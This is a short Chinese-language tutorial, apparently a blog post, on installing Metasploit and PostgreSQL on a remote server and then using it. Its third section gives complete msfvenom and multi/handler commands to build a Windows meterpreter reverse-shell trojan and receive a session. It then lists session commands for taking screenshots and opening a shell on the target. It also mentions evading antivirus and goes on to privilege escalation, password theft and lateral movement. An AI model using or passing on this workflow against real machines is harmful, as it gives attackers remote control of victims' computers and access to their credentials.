在校园网内,禁止使用路由器之类的,所以就导致自己本地虚拟机环境出现各种各样的网络问题,解决起来过于繁琐,为此在服务器上安装MSF
0x00 安装MSF
使用Xshell
等工具连上远程服务器后,首先确保服务器的网络是可以正常访问外网的
使用curl http://dyboy.cn
测试一下
网络没问题,接下来命令如下
// 切换目录 cd /home // 获取MSF安装脚本 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall // 修改权限 chmod 755 msfinstall // 开始安装 ./msfinstall
等待一会儿就安装好了,服务器的入网带宽是非常高的,即服务器的下载速度很快
0x01 安装postgresql
因为MSF
需要记录一些数据,依赖于postgresql
,因此还需要安装
同样在当前home
目录下
// 获取安装 apt-get install postgresql // 切换到postgres用户 su postgres // 登录postgresql数据库,首次登录没有密码 psql // 修改数据库用户postgres的密码 \password postgres // 退出 \q // 初始化 msfdb init
0X02 MSF初体验
// 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 set LHOST 0.0.0.0 set LPORT 服务器监听端口 // 运行 run
在实际环境当中还需要对小马文件编码免杀等操作
本地电脑执行test.exe
文件
服务端获取会话
获取到的是以当前执行木马用户的身份
// 将会话维持 background // 罗列会话 sessions // 进入会话 sesions 会话id // 获取目标主机屏幕截图 screenshot // 进入目标主机的Shell shell // 退出shell exit // 更多内容可以通过帮助查看 help
后续就是提权、抓密码、横向渗透的事情了